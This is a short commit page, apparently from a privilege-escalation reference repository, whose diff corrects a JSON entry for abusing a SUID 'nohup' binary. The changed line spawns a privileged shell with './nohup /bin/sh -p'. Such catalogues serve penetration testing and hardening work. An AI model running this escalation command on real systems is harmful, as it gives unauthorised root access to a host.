fix nohup suid

master
Mr. Robot 3 years ago committed by GitHub
parent 6efa5ad2fc
commit 6736253288
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

@ -17,8 +17,8 @@
], ],
"suid": [ "suid": [
{ {
"code": "sudo nohup /bin/sh -p -c \"sh -p <$(tty) >$(tty) 2>$(tty)\"" "code": "./nohup /bin/sh -p -c \"sh -p <$(tty) >$(tty) 2>$(tty)\""
} }
] ]
} }
} }

Loading…
Cancel
Save